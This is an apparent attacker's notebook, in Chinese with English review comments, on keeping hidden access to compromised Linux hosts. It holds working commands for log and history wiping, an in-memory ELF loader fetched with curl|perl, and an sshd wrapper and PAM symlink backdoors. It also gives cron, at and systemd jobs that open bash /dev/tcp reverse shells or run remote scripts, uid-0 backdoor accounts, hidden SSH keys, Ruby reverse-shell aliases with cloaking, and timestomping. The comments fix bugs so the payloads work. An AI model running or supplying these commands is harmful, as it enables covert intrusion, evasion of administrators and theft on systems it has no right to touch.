[TOC]
linux持久化笔记 随缘完善更新
tips
##查看机器配置
# Quick host triage: who we are, CPU, memory, disks and distro release.
# Chained with && on purpose: a missing tool (lsb_release is often absent on
# minimal images) stops the run there instead of hiding the failure.
whoami \
  && lscpu \
  && free -h \
  && df -h \
  && lsb_release -a
##接shell
# Listener for the callback. rlwrap adds line editing/history; -S sets a coloured "ds> " prompt.
# -nvlp binds all interfaces on 8880 (netcat-traditional / ncat syntax; some OpenBSD-nc
# builds reject -p together with -l). Anything that reaches the port gets the session —
# there is no authentication on this listener.
rlwrap -S "$(printf '\033[95mds>\033[m ')" nc -nvlp 8880
##别人写的自动化脚本
# Fetch the script to disk first so it can be read before anything runs.
wget https://raw.githubusercontent.com/Trevohack/DynastyPersist/main/src/dynasty.sh
# NOTE(review): this pulls from the mutable "main" branch of a third-party repo and
# pipes it straight into bash — the content can change between two reads and nothing
# checks its integrity. Review the downloaded copy and pin a commit before running it.
curl -sSL https://raw.githubusercontent.com/Trevohack/DynastyPersist/main/src/dynasty.sh | bash
# The "$ " lines are the tool's usage; "show payloads" / "use x" are its own console
# commands, not shell.
$ ./dynasty.sh <lhost> <lport> <mode>
$ ./dynasty.sh ctf
$ ./dynasty.sh 10.10.14.3 9999 console
show payloads
use x
##pty
# Find an available interpreter (prints the path of each one that exists).
which python python2 python3
# Upgrade the raw socket shell to a pty so job control, su/sudo password prompts and
# full-screen tools work. Substitute whichever python was found above.
python3 -c 'import pty;pty.spawn("/bin/bash")'
##痕迹清除
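# Trace cleanup. NOTE(review): wiping /var/log wholesale is itself a loud indicator
# (and breaks logging daemons until they are restarted); the original notes keep it,
# so it is kept here — only the shell bugs are fixed.
#
# Drop access-log lines whose client address starts with "101" (adjust the pattern).
# Run in the foreground: the original backgrounded this with "&" while rm ran
# concurrently, so rm could delete sed's temp file in /var/log/nginx mid-rewrite.
sed -i '/^101/d' /var/log/nginx/access.log
# Clear the in-memory history of *this* shell. "history -c &" (original) runs in a
# backgrounded subshell and does nothing to the parent. Also stop bash from writing
# HISTFILE on exit, otherwise ~/.bash_history is recreated when the session ends.
history -c
unset HISTFILE
rm -f ~/.bash_history
# Auth/login records. Deleting wtmp/lastlog/faillog (rather than truncating them)
# leaves obvious gaps and the daemons may recreate them empty.
rm -rf /var/log/auth.log /var/log/secure /var/log/faillog /var/log/lastlog /var/log/wtmp
rm -rf /var/log/*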
##隐身登陆
# Run a shell without the login dotfiles (no .bash_profile/.bashrc hooks; a
# non-interactive bash writes no history). The connection is still recorded by
# sshd (auth.log / journal) and visible in `ss`.
ssh username@hostname "bash --noprofile --norc"
# -T: no pty, so no utmp/wtmp/lastlog entry is written (w / last won't show the
# session). -i still makes bash interactive, so it will save history to HISTFILE
# on exit unless that is unset.
ssh -T username@host /bin/bash -i
# Keep the host key out of the attacker's own known_hosts.
ssh -o UserKnownHostsFile=/dev/null -T user@hostname
# NOTE(review): bash has no "-f = no profile" option; "-if" is -i plus -f (set -f,
# disable globbing). Probably -i alone was intended — confirm.
/bin/bash -if
##cf支持的端口
http端口 https端口
80 443
8080 2053
8880 2083
2052 2087
2082 2096
2086 8443
2095
##添账号
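## Which groups root belongs to (usually just "root")
groups root
# Create the account (no -m: no home directory unless CREATE_HOME is set in login.defs).
useradd config
passwd config
# The admin group differs per distro: "sudo" on Debian/Ubuntu, "wheel" on RHEL/CentOS —
# usermod fails if the named group does not exist.
usermod -aG sudo config
# Group root only grants what group-root files allow; redundant once sudo works.
usermod -aG root config
# Fixed: appending to /etc/sudoers with echo skips validation, and one malformed
# line breaks sudo for every user on the box. Validate the fragment with visudo
# first, then append, then re-check the combined file.
sudoers_frag=$(mktemp)
printf 'config ALL=(ALL) ALL\n' > "$sudoers_frag"
visudo -cf "$sudoers_frag" && cat "$sudoers_frag" >> /etc/sudoers
rm -f -- "$sudoers_frag"
visudo -c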
0. 内存执行ELF
优点:不落地——ELF 只存在于 memfd_create 创建的匿名内存文件里,磁盘上没有文件,好用
扩展:可以和其他技术结合起来,比如通过 fexecve 调用 memfd_create 创建的匿名文件句柄
demo: https://asciinema.org/a/173715
低版本 glibc 编译的动态链接文件可在高版本 glibc 上执行,反过来(高版本编译、低版本运行)通常会因缺少符号版本而失败;下面用 -static 编译 elfshell 就不依赖目标的 glibc 版本了。
## Check the target's glibc version (only matters for dynamically linked payloads;
## the -static build used further down sidesteps it)
ldd --version
## e.g. "ldd (GNU libc) 2.17" — the target ("ten") server's glibc was older than the build box
# Session notes, not commands: a loader built against glibc 2.17 calling back to
# kali:8880, and a Go exec stub driving a Perl script whose content was "curl http://xxx/xxx|sh".
~/tmp/elfshell-glibc-2.17 kali:8880
exec.go ~/elf/exec.pl ~/tmp/sysConfig.pl 内容是:curl http://xxx/xxx|sh
mes
# Run the loader in the background. One-shot payloads (e.g. a file download) make the
# ELF exit when they finish; it does not loop.
Ctrl+z
bg
1 ## The file that runs the command. demoshell can be swapped for anything: fetch it, set the IP/port, build it on the attack box; plain Linux commands can be compiled from C. Any ELF can be substituted here.
https://gist.githubusercontent.com/magisterquis/ce8b99b42188f4517efb3e1038a483de/raw/cc9c2f96bc982b82ded64a734aeb850f73fd2f93/demoshell.go
# Static, PIC build so the binary does not depend on the target's glibc version.
go build -ldflags '--extldflags "-static -fpic"' -o elfshell ./demoshell.go
2 ## Write the loader header into elfload.pl (tee also echoes it to the terminal)
cat elfload.pl.head | tee elfload.pl
文件内容elfload.pl.head
'''
#!/usr/bin/env perl
use warnings;
use strict;
$|=1;
print "Making anonymous file...";
my $name = "";
# Raw memfd_create(name, MFD_CLOEXEC). 319 is the x86_64 syscall number; other
# architectures use a different one (aarch64: 279), so this dies with ENOSYS there.
my $fd = syscall(319, $name, 1);
if (-1 == $fd) {
die "memfd_create: $!";
}
print "fd $fd\n";
# Wrap the raw fd in a Perl filehandle and make it unbuffered.
open(my $FH, '>&='.$fd) or die "open: $!";
select((select($FH), $|=1)[0]);
print "Writing ELF binary to memory...";
'''
3 ## Embed elfshell into elfload.pl: read it 32 bytes at a time and emit one hex-encoded print per chunk
perl -e '$/=\32;print"print \$FH pack q/H*/, q/".(unpack"H*")."/\ or die qq/write: \$!/;\n"while(<>)' elfshell >> elfload.pl
4 ## Append the tail to elfload.pl
cat elfload.pl.tail | tee -a elfload.pl
文件内容elfload.pl.tail
'''
print "done\n";
print "Here we go...\n";
# exec the in-memory file via /proc/<pid>/fd/<fd>; "formsec" is the argv[0] shown in ps.
# Because the memfd was created with an empty name, /proc/<pid>/exe of the result
# typically reads "/memfd: (deleted)" — an easy hunting signal.
exec {"/proc/$$/fd/$fd"} "formsec"
or die "exec: $!";
'''
5 ## On the target: fetch and run the loader (plain HTTP; nothing verifies what gets executed)
curl http://1.1.1.1/elfload.pl|perl
curl http://xxx/xxx.pl|perl
## Catch the shell
rlwrap -S "$(printf '\033[95mds>\033[m ')" nc -nvlp 8880
1. ssh wrapper后门
优点:无需编译,只有在连接后有进程
缺点:需要重启 sshd;而且 /usr/sbin/sshd 被换成了 perl 脚本,rpm -V openssh-server / debsums 之类的包完整性校验会直接报出来
##### One-liner on the victim (the same steps as below, chained)
cd /usr/sbin/&&mv sshd ../bin/&&echo '#!/usr/bin/perl' >sshd&&echo 'exec "/bin/sh" if(getpeername(STDIN) =~ /^..4A/);' >>sshd&&echo 'exec{"/usr/bin/sshd"} "/usr/sbin/sshd",@ARGV,' >>sshd&&chmod u+x sshd&&/etc/init.d/sshd restart
## Step by step on the victim
cd /usr/sbin/
# Park the real daemon in /usr/bin; the wrapper below execs it from there.
mv sshd ../bin/
echo '#!/usr/bin/perl' >sshd
# By default sshd re-execs itself per connection with the client socket on stdin,
# so the wrapper runs for every client. It inspects the peer sockaddr: bytes 3-4
# are the source port, and "4A" = 0x3441 = 13377, matching sourceport= in the socat
# command below. Any other client falls through to the real sshd.
echo 'exec "/bin/sh" if(getpeername(STDIN) =~ /^..4A/);' >>sshd
# argv[0] stays /usr/sbin/sshd so process listings look normal (the trailing comma is legal Perl).
echo 'exec{"/usr/bin/sshd"} "/usr/sbin/sshd",@ARGV,' >>sshd
# u+x only: the service runs as root, so that is enough.
chmod u+x sshd
# On systemd hosts without an init script use `systemctl restart sshd`. The
# package-owned binary is now a Perl script, so rpm -V openssh-server / debsums
# will flag it; the shell spawned this way is unauthenticated and unlogged.
/etc/init.d/sshd restart
## From the attacker: connect with the magic source port
socat STDIO TCP4:vicIP:22,sourceport=13377
2. ssh 软链接后门(sshd 用 argv[0] 的 basename 作为 PAM 服务名,借此套用 su 的 PAM 配置)
没成功(这一招依赖 sshd_config 里 UsePAM yes、/etc/pam.d/su 中的 pam_rootok.so,以及 PermitRootLogin 允许口令登录 root;任一条不满足都会失败)
## new
# Copy su's PAM stack under a new service name. /etc/pam.d/su usually contains
# "auth sufficient pam_rootok.so", which succeeds whenever the calling process is
# root — so a root-run sshd using this stack accepts any password.
cp /etc/pam.d/su /etc/pam.d/java
#cp /etc/pam.d/su postgres
# sshd derives its PAM service name from the basename of argv[0] (unless built with
# a fixed name), so a symlink called "java" makes it read /etc/pam.d/java. Needs
# UsePAM yes; root login is still governed by PermitRootLogin in /etc/ssh/sshd_config.
ln -sf /usr/sbin/sshd /java;
#ln -sf /usr/sbin/sshd /postgres
# Second daemon on its own port; it shows in `ss -lntp` as "java" owned by root.
/java -oPort=11212
#/postgres -oPort=5555
# (duplicate of the three commands above)
cp /etc/pam.d/su /etc/pam.d/java
ln -sf /usr/sbin/sshd /java;
/java -oPort=11212
## old (classic variant): reuse the "su" name itself, no extra PAM file needed
ln -sf /usr/sbin/sshd /tmp/su;
/tmp/su -oPort=11212
3. OpenSSH后门制作
4. 计划任务
crontab 文件通常位于以下目录中:
/var/spool/cron/crontabs/username
(对于基于 Debian/Ubuntu 的系统)
/var/spool/cron/username
(对于基于 Red Hat/CentOS 的系统;/var/spool/cron/tabs/username 是 SUSE 的路径)
普通,部署到当前用户
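## Append a job to the current user's crontab (crontab -l complains on an empty
## crontab but the pipeline carries on; "*/1" is the same as "*").
crontab -l | { cat; echo "*/1 * * * * bash -i >& /dev/tcp/192.168.44.128/2333 0>&1"; } | crontab -
# Hiding trick: the entry ends in "\r" followed by a fake "no crontab for <user>"
# padded to 100 columns, so on a terminal `crontab -l` / cat overwrite the real line
# and show only the fake message. `cat -A` or `crontab -l | od -c` still reveals it.
(crontab -l;printf "*/1 * * * * bash -i >& /dev/tcp/192.168.44.128/5555 0>&1;\rno crontab for $(whoami)%100c\n")|crontab -
# System crontab (has a user field). Fixed schedule: "* */5 * * *" meant "every
# minute during hours 0,5,10,...", not every five minutes; "*/5 * * * *" is every
# five minutes. Re-running while the previous sshd still listens just fails to
# bind — harmless, but the daemon logs it.
echo '*/5 * * * * root ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oPort=31337' >> /etc/crontab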
部署到/etc/crontab,5mins端口31337启动ssh守护进程
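# Every five minutes, (re)start an sshd named "su" on 31337 as root.
# Fixed schedule: "* */5 * * *" meant "every minute during hours 0,5,10,...",
# not every five minutes. A second start while the first still listens just fails
# to bind, which is harmless but logged.
echo '*/5 * * * * root ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oPort=31337' >> /etc/crontab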
部署到/etc/cron.*/
## Kali is already listening. These write "every minute, pull and run" into cron.d
## files that look like they belong to a package; the payload calls back on 443.
# /etc/cron.d/man-db is shipped by Debian-family man-db and /etc/cron.d/0hourly by
# RHEL-family cronie, so an appended line blends into an existing file — but it
# also changes that file's mtime/hash, which debsums / rpm -V and file-integrity
# monitoring may pick up. Fetches over plain HTTP with no integrity check.
echo '*/1 * * * * root curl http://xxx/a|sh' >> /etc/cron.d/man-db
# Placeholder: replace base64EncodeText with the base64 of the command to run.
echo '*/1 * * * * root echo base64EncodeText|base64 -d|sh' >> /etc/cron.d/0hourly
echo '*/1 * * * * root echo base64EncodeText|base64 -d|sh' >> /etc/cron.d/man-db
at 只在指定时间运行一次,不是周期任务,不好用。下面的写法通过让任务自己再 at 一次来循环。
# "/tmp/..." is a literal file named "..." — easy to miss in a directory listing.
# The file re-queues itself (the at job runs it, and it calls at again) before
# opening the reverse shell, so as written it appears to keep re-scheduling every
# minute. Needs atd running; `atq` lists pending jobs.
echo "at now+1min <<EOF" >> /tmp/...
echo "bash /tmp/..." >> /tmp/...
echo "EOF" >> /tmp/...
echo "bash -i >& /dev/tcp/192.168.44.123/10092 0>&1;" >> /tmp/...
# Kick off the first run.
at now+1min <<EOF
bash /tmp/...
EOF
at C2远程,不好用
#c2server: build the same self-requeuing job file, but each run fetches its payload from the C2
echo "at now+1min <<EOF" >> /tmp/...
echo "curl http://xxx/xxx | sh" >> /tmp/...
echo "EOF" >> /tmp/...
echo "bash -i >& /dev/tcp/xxx/8080 0>&1;" >> /tmp/...
# Serve the files over plain HTTP (anyone on the path can read or swap the payload).
python3 -m http.server 80
#victim: one-off job that pulls and runs /config from the C2 one minute from now
at now+1min <<EOF
curl http://xxx/config | sh
EOF
# Equivalent forms: read the job from a file, or pipe the command in.
at -f /xx/xx now + 1 minute
echo "curl http://xxx | sh" | at now + 1 minute
5. 后门账户
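# Backdoor accounts. Every variant below leaves an entry in /etc/passwd and
# /etc/shadow, so diffing those files or a uid-0 scan (awk -F: '$3==0' /etc/passwd)
# finds them; the "hiding" is only in the name.

# Remove a user (-f also kills their processes / removes the home dir).
userdel -f xx

# Shadow-root account: a second uid-0 login, no home dir (-M), with a shell.
# passwd --stdin is RHEL/CentOS-only; on Debian/Ubuntu use chpasswd (see below).
useradd -u 0 -o -g root -G root -M -s /bin/bash config && echo "xxx" | passwd config --stdin
passwd config
# Password logins must be on for this to be reachable over SSH. Appending only takes
# effect after an sshd reload, and an earlier uncommented "PasswordAuthentication no"
# wins, because sshd keeps the first value it parses for a keyword.
echo "PasswordAuthentication yes" >> /etc/ssh/sshd_config

# Ordinary-privilege account with an innocuous name (mining, botnet, ...).
# Fixed: the original line ended in a full-width comma (、) glued to -m, which
# makes useradd reject the option.
useradd -d /x -c "config" -s /bin/bash config -m
useradd -d /home/... -s /bin/bash x -m

## CentOS 7: create a uid-0 user from the command line
# 1. Directly
useradd -o -u 0 config && echo "xxx" | passwd config --stdin
# 2. Via /root/.bashrc + PROMPT_COMMAND: runs the next time root opens an
#    interactive shell, then unsets itself (the line itself stays in .bashrc).
echo 'export PROMPT_COMMAND="/usr/sbin/useradd -o -u 0 config &>/dev/null && echo config:xxx | /usr/sbin/chpasswd &>/dev/null && unset PROMPT_COMMAND"'>>/root/.bashrc

## Ubuntu: create a uid-0 user with a pre-hashed password
# Fixed: the original passed "-p 0" and then the hash as a stray positional
# argument, which useradd rejects; -p takes the crypt(3) hash itself.
useradd -p "$(openssl passwd -1 -salt 'abc' xxx)" -u 0 -o -g root -G root -s /bin/bash config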
6. pubKey
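## Point sshd's AuthorizedKeysFile somewhere unexpected so the real key file is not where people look
# What is configured now (a leading "#" means the compiled-in default .ssh/authorized_keys).
cat /etc/ssh/sshd_config|grep AuthorizedKeysFile
# Fixed: the original appended "AuthorizedKeysFile .cache" and then made ~/.cache a
# *directory* holding ssh.rc, so sshd would open a directory and pubkey auth would
# break. The directive must name the file. Keeping the default path in the list is
# what lets ordinary users' keys keep working (sshd tries each listed file in turn).
# Caveats: sshd uses the first AuthorizedKeysFile it parses, so an earlier
# uncommented line wins over an appended one; lines appended after a Match block
# belong to that block; and the change only applies after an sshd reload.
echo "AuthorizedKeysFile .ssh/authorized_keys .cache/ssh.rc" >> /etc/ssh/sshd_config
echo "PubkeyAuthentication yes" >> /etc/ssh/sshd_config
#others_user: expose root's existing key file under the hidden path via a hard link
mkdir -p ~/.cache
ln /root/.ssh/authorized_keys ~/.cache/ssh.rc
#target_user: drop the attacker's public key for one specific user.
# Fixed: "~${target_user}" never tilde-expands (bash only expands a literal login
# name after "~"), so the original created a directory literally named "~<user>"
# under the cwd and then appended the key to the *current* user's file. Resolve the
# home directory from the passwd database instead.
target_home=$(getent passwd "${target_user}" | cut -d: -f6)
mkdir -p "${target_home}/.cache"
echo -e "\n\nxxxxxxx\n\n" >> "${target_home}/.cache/ssh.rc"
# StrictModes (default yes) makes sshd ignore the file if it or its directory is
# group/world-writable or not owned by that user — fix ownership/mode if needed.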
7. 别名后门
优点:隐藏得深 ,但命令或网络情况复杂会延迟,会被发现
缺点:需要机会——/etc/yum/yum-update.rc 不会被系统自动加载,要等有地方 source 它(例如对方执行 yum 更新时触发的钩子)才会生效
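## Ruby reverse shell, plain TCP (catch with nc)
# The alias redefines a function "alerts" on every ls: it runs the real ls, then
# forks a ruby client (the parent exits so the prompt returns at once). Fixed: $*
# must be escaped (\$*) inside the double-quoted alias, otherwise it is expanded
# when the alias is *defined* (to nothing) and "ls /etc" silently lists the cwd.
alias ls="alerts(){ ls \$* --color=auto;ruby -rsocket -e 'exit if fork;c=TCPSocket.new("'"'"attackMa"'"'","'"'"443"'"'");while(cmd=c.gets);IO.popen(cmd,"'"'"r"'"'"){|io|c.print io.read}end';};alerts"
## Ruby reverse shell over TLS (catch with msf)
# Same \$* fix, plus: the original wrote IO.popen(cmd.to_s,"r") without the
# "'"'"r"'"'" quoting dance, so the shell consumed the double quotes and ruby got a
# bare r (NameError on every command received).
alias ls="alerts(){ ls \$* --color=auto;ruby -rsocket -ropenssl -e 'exit if fork;c=OpenSSL::SSL::SSLSocket.new(TCPSocket.new("'"'"192.168.242.1"'"'","'"'"5555"'"'")).connect;while(cmd=c.gets);IO.popen(cmd.to_s,"'"'"r"'"'"){|io|c.print io.read}end';};alerts"
## Wrap alias/unalias as well so the hook does not show up, and park the file
## somewhere inconspicuous (vi /etc/yum/yum-update.rc). Nothing on this page
## sources that file; something (a profile hook, or whatever runs on yum update)
## must source it for the aliases to load.
# Fixed: the heredoc delimiter is quoted. With a bare EOF the shell expanded $#,
# $* and ${*} while writing the file, so the unalias wrapper was stored as
# "if [ 0 != 0 ]" and always printed the usage text.
cat > /etc/yum/yum-update.rc <<'EOF'
alias ls="alerts(){ ls \$* --color=auto;ruby -rsocket -e 'exit if fork;c=TCPSocket.new("'"'"attackMa"'"'","'"'"443"'"'");while(cmd=c.gets);IO.popen(cmd,"'"'"r"'"'"){|io|c.print io.read}end';};alerts"
alias unalias='alerts(){ if [ $# != 0 ]; then if [ $* != "ls" ]&&[ $* != "alias" ]&&[ $* != "unalias" ]; then unalias $*;else echo "-bash: unalias: ${*}: not found";fi;else echo "unalias: usage: unalias [-a] name [name ...]";fi;};alerts'
alias alias="cat /tmp/.alias.txt"
EOF
# Canned "alias" output that mimics a stock CentOS alias list.
# Note: `type ls`, `command -V ls`, `\ls` and `declare -f alerts` all still expose the hook.
cat > /tmp/.alias.txt <<'EOF'
alias egrep='egrep --color=auto'
alias fgrep='fgrep --color=auto'
alias grep='grep --color=auto'
alias l.='ls -d .* --color=auto'
alias ll='ls -l --color=auto'
alias ls='ls --color=auto'
alias vi='vim'
alias which='alias | /usr/bin/which --tty-only --read-alias --show-dot --show-tilde'
EOF
# Timestomp: copy atime/mtime from a sibling config file so the new file does not
# stand out by date (ctime cannot be set this way and still gives it away).
cd /etc/yum/&&touch -acmr version-groups.conf yum-update.rc
## hash backdoor
# bash's command hash table is consulted before the PATH search; this makes a bare
# "ls" run pwd in every login shell that sources /etc/profile.
echo "hash -p /usr/bin/pwd ls" >> /etc/profile
## Not usable: hash -p takes a pathname, not a command line
# echo "hash -p 'useradd -o -u 0 config && echo "'"'"xxx"'"'" | passwd config --stdin' ls" >> /etc/profile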
8.systemd服务后门
优点:不看 unit 文件不容易被发现(但 systemctl list-unit-files / list-units 会把它列出来)
缺点:需要机会
不成功:systemd 的 ExecStart= 不经过 shell,`curl ...|perl` 里的管道不会生效(`|` 和 `perl` 会被当成 curl 的参数);而且 Type=forking 要求进程自己后台化并退出,这里的命令不会,所以启动会挂起直到超时。
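# systemd service backdoors. Fixed two things that made the original units fail:
# ExecStart= is not run through a shell, so "curl ... | perl" handed "|" and "perl"
# to curl as arguments; and Type=forking waits for the process to daemonize and
# exit, which a foreground curl|perl never does, so the start hung until timeout.
# Wrapping the command in /bin/sh -c and using Type=simple addresses both.
# Caveats: /usr/lib/systemd/system is the package-owned unit directory (an unknown
# file there stands out to package verification; /etc/systemd/system is the admin
# path), and either way `systemctl list-unit-files` shows the new unit.
# Fetches run over plain HTTP with no integrity check on what gets executed.
# 1. Run once per boot, after the network is actually up
#    (network-online.target; plain network.target can fire before any address is configured).
cat > /usr/lib/systemd/system/config.service <<'EOF'
[Unit]
Description=Systemctl Config.
Wants=network-online.target
After=network-online.target
[Service]
Type=simple
ExecStart=/bin/sh -c 'curl http://xxx/xxx.pl|perl'
ExecReload=
ExecStop=
PrivateTmp=true
[Install]
WantedBy=multi-user.target
EOF
systemctl daemon-reload
systemctl enable config
systemctl start config
# 2. Cron-like: systemd restarts the job 12s after it exits, indefinitely
cat > /usr/lib/systemd/system/guard.service <<'EOF'
[Unit]
Description=guard
Wants=network-online.target
After=network-online.target
[Service]
Type=simple
ExecStart=/bin/sh -c 'curl http://xxx/xxx.pl|perl'
Restart=always
RestartSec=12s
[Install]
WantedBy=default.target
EOF
systemctl daemon-reload
systemctl enable guard
systemctl start guard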
9. PAM后门制作
Linux Pam后门总结拓展 - 先知社区
10. rootkit
自动化脚本
偷账户密码还是使用PAM后门或者OpenSSH编译后门更为稳定且不易发现